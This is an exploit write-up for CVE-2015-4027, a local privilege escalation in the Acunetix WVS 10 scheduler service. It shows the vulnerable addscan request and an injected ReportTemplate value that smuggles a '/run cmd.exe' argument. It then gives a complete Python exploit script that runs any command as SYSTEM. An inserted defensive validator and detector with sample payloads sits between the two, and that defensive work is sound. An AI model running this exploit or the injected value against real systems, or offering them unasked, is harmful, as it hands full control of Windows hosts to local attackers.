Acunetix WVS 10-local Privilege escalation


========================================================================
Acunetix WVS 10 - from Guest to SYSTEM (Local privilege escalation)

CVE: CVE-2015-4027
Author: Daniele Linguaglossa (me)
Affected Product: Acunetix WVS 10
Exploit: Local privilege escalation
Vendor: Acunetix Ltd
Remote: no
Version: 10
=========================================================================
A local privilege escalation exists in Acunetix WVS: it allows a local user
(even a Guest) to gain the same privileges as the SYSTEM user.

With a default Acunetix installation a service called "ACUWVSSCHEDULERV10"
is installed, and this service runs as Local System.

ACUWVSSCHEDULERV10 is responsible for scan scheduling without user interaction.
It exposes an API over a web server, usually on localhost:8183.

API endpoints:

/listscan
/addscan <== the vulnerable one
/deletescan
etc...

When a user schedules a scan, the "addscan" API is called as follows:

-------------------------------------------------------------------------------
POST /api/addscan HTTP/1.1
Host: localhost:8183
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
RequestValidated: true
X-Requested-With: XMLHttpRequest
Referer: http://localhost:8183/
Content-Length: 452
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

{
  "ScanType": "Scan",
  "TargetList": "",
  "Target": ["http://.target.it"],
  "Recurse": "-1",
  "Date": "12/2/2015",
  "DayOfWeek": "1",
  "DayOfMonth": "1",
  "Time": "12:21",
  "Deleteaftercompletion": "False",
  "Params": {
    "Profile": "Default",
    "Loginseq": "<none>",
    "Settings": "Default",
    "Scanningmode": "Heuristic",
    "Excludedhours": "<none>",
    "Savetodatabase": "True",
    "Savelogs": "False",
    "GenerateReport": "False",
    "Reportformat": "PDF",
    "ReportTemplate": "WVSAffectedItemsReport.rep",
    "EmailAddress": ""
  }
}
------------------------------------------------------------------------------

The first thing I noticed is the ReportTemplate: it is used to create the report
when the scan ends, which means an external file we control would be used by
SYSTEM! That is interesting enough, but I never looked deeper into it.
Instead I noticed something even worse: the file name is used as an argument to
wvs.exe, which is called with SYSTEM privileges!

By looking at how Acunetix handled the ReportTemplate argument I figured out it was
possible to inject custom arguments within ReportTemplate.
Acunetix helps us :D In fact wvs.exe is provided with an interesting argument,
/run, as the reference says:

https://www.acunetix.com/blog/docs/acunetix-wvs-cli-operation/

Run a command line command during the crawl.
Syntax: /run [command]

Example: /run curl http://example.com/dir1/

Wow, that's really nice! So in order to execute a command we must insert a fake
/crawl followed by a /run command, so ReportTemplate becomes:

"ReportTemplate": "WVSAffectedItemsReport.rep /crawl http://fakesite.it /run cmd.exe"

It worked: cmd.exe ran as SYSTEM!
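As an added example (not part of the original advisory), a defender-side check for the injection described above: an allow-list validator for the ReportTemplate value, plus a small detector that flags /api/addscan bodies carrying a smuggled /crawl or /run switch. The allow-listed template names and the sample bodies are constructed for the example.

```python
import json
import re

# Allow-list of report templates the scheduler may hand to wvs.exe.
# Only the two names that appear in the write-up are listed; add others as needed.
ALLOWED_TEMPLATES = {"wvsaffecteditemsreport.rep", "wvsdeveloperreport.rep"}

# A safe template is a bare file name: no whitespace, no path separators and
# no '/' switch characters, so nothing extra can reach the wvs.exe command line.
_SAFE_NAME = re.compile(r"^[A-Za-z0-9_]+\.rep$")

# Switches that must never appear inside a file-name field; /run is the one
# the write-up abuses and /crawl is the prefix it needs to reach it.
_INJECTED_SWITCH = re.compile(r"\s/(run|crawl)\b", re.IGNORECASE)


def validate_report_template(value):
    """Return the template name if acceptable, otherwise raise ValueError."""
    if not isinstance(value, str) or not _SAFE_NAME.match(value):
        raise ValueError("report template must be a bare .rep file name")
    if value.lower() not in ALLOWED_TEMPLATES:
        raise ValueError("unknown report template")
    return value


def flag_addscan_body(body):
    """Return a list of findings for one /api/addscan JSON body (empty if clean)."""
    findings = []
    params = json.loads(body).get("Params") or {}
    tmpl = params.get("ReportTemplate", "")
    if _INJECTED_SWITCH.search(tmpl):
        findings.append("argument injection in ReportTemplate: %r" % tmpl)
    try:
        validate_report_template(tmpl)
    except ValueError as exc:
        findings.append("rejected ReportTemplate: %s" % exc)
    return findings


# Constructed sample bodies, modelled on the request shown in the write-up.
BENIGN = json.dumps({"ScanType": "Scan",
                     "Params": {"ReportTemplate": "WVSAffectedItemsReport.rep"}})
MALICIOUS = json.dumps({"ScanType": "Scan", "Params": {
    "ReportTemplate": "WVSAffectedItemsReport.rep /crawl http://fakesite.it /run cmd.exe"}})

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, flag_addscan_body(body))
```

The same two checks can be applied on the service side before the value is placed on the command line, or by a proxy/log monitor in front of port 8183.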
==================================================================================

Now let's PWN this!

escalation.py (Python 2):

```python
import httplib
import json
import sys
from datetime import datetime
from time import gmtime, strftime

# Command to be executed as SYSTEM; defaults to cmd.exe
command = sys.argv[1] if len(sys.argv) > 1 else "cmd.exe"
acuhost = '127.0.0.1'
acuport = 8183
acuheaders = {
    "Content-Type": "application/json; charset=utf-8",
    "X-Requested-With": "XMLHttpRequest",
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "RequestValidated": "true"
}
# Appended to the ReportTemplate value: a fake /crawl target followed by /run <command>
acuexploit = " /crawl http://www.google.it /run \"" + command + "\""
acudata = {"ScanType": "Scan",
           "TargetList": "",
           "Target": ["http//" + "A" * 2048],  # bogus target, the scan itself does not matter
           "Recurse": "-1",
           "Date": strftime("%m/%d/%y", gmtime()),
           "DayOfWeek": "1",
           "DayOfMonth": "1",
           # schedule the scan one minute from now
           "Time": "%s:%s" % (datetime.now().hour, datetime.now().minute + 1),
           "Deleteaftercompletion": "False",
           "Params": {"Profile": "Default",
                      "Loginseq": "<none>",
                      "Settings": "Default",
                      "Scanningmode": "Heuristic",
                      "Excludedhours": "<none>",
                      "Savetodatabase": "True",
                      "Savelogs": "False",
                      "GenerateReport": "False",
                      "Reportformat": "PDF",
                      "ReportTemplate": "WVSDeveloperReport.rep" + acuexploit,
                      "EmailAddress": ""}
           }


def sendexploit():
    # POST the scheduled scan to the scheduler's local API
    conn = httplib.HTTPConnection(acuhost, acuport)
    conn.request("POST", "/api/addscan", json.dumps(acudata), acuheaders)
    resp = conn.getresponse()
    return "%s %s" % (resp.status, resp.reason)


print "Acunetix WVS local privilege escalation by Daniele Linguaglossa\n"
print "[+] command: %s would be executed as SYSTEM" % command
print "[+] sending exploit..."
print "[+] Result: " + sendexploit()
print "[+] done!"
```
============================================================================

I hope this write-up was fun enough. Anyway, I would really like to thank
Acunetix Product Manager N.S. for the really fast answer and bug mitigation.
A patch exists right now, so hurry up and download it.
============================================================================
